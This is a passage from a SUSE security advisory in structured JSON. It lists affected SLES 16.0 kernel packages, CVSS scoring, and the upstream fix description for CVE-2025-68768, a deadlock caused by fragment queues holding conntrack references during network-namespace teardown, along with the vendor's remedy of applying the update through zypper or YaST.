"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
